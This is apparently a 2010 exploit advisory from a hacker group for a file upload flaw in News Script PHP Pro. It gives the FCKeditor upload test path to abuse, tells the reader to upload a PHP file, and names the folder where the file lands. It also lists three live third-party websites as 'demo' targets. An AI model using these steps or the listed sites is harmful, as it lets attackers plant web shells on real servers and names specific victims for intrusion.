============================================================================== [] News Script PHP Pro (fckeditor) File Upload Vulnerability ============================================================================== [] Title : [ News Script PHP Pro (fckeditor) File Upload Vulnerability ] [] Script : [ News Script PHP Pro ] [] Platform: [ linux/php ] [] Download: [ http://newsscriptphp.com/ ] [] Author : [ Net.Edit0r } [] Email : [ black.hat.tm@gmail.com ] [] Date : [ 2010-12-26 ] [] Version : [ Full Version ] ########################################################################### ===[ Exploit ]=== ./Iranian HackerZ [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html [»] Select the "File Upload" To use = php ===[ Upload To ]=== [»] http://server/[patch]/userfiles/Name File ===[ Demo ]=== [»] http://www.footydraft.com/news/fckeditor/editor/filemanager/connectors/uploadtest.html [»] http://www.htarcade.com/news_script/fckeditor/editor/filemanager/connectors/uploadtest.html [»] http://funeralscriptphp.com/funeralscript/fckeditor/editor/filemanager/connectors/uploadtest.html Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor BHG : Net.Edit0r ~ Darkcoder ~ keracker ###########################################################################